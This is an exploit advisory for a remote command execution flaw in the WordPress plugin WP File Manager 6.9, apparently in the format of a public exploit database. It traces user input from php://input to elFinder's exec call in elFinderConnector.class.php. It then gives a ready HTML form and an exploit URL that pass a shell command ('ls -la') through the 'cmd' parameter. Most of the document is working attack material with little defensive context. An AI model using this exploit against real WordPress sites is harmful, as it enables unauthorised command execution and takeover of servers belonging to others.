[-] Title : Wp File Manager V6.9 - Remote Command Execution
[-] Author : Milad Karimi
[-] Vendor : https://wordpress.org/plugins/wp-file-manager
[-] Category : Webapps
[-] Date : 2020-10-27
Vulnerable Page:
/elFinderConnector.class.php
Vulnerable Source:
160: exec elFinder->exec ($cmd, $args)
108: $cmd = $src['cmd'] : '';
93: $src[$key][] = rawurldecode($value); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), if(preg_match('/^(.+?)\[([^\[\]]*)\]$/', $key, $m)), if($idx) else ,
82: list($key, $value) = array_pad(explode('=', $part), 2, ''); // list() if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)),
81: foreach($parts as $part) // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)),
78: $parts = explode('&', $rawPostData); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')),
76: $rawPostData = file_get_contents('php://input')){ // , trace stopped
80: $src = array(); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)),
74: $src = array_merge($_GET, $_POST) : $_GET;
requires:
71: ⇓ function run()
Exploit Code:
<html>
<form action="http://localhost/lib/php/elFinderConnector.class.php" method="GET">
<input name="cmd" type="text">
<input type="submit" value="RCE!" >
</form>
</html>
Exploit URL:
http://localhost/lib/php/elFinderConnector.class.php?cmd=ls -la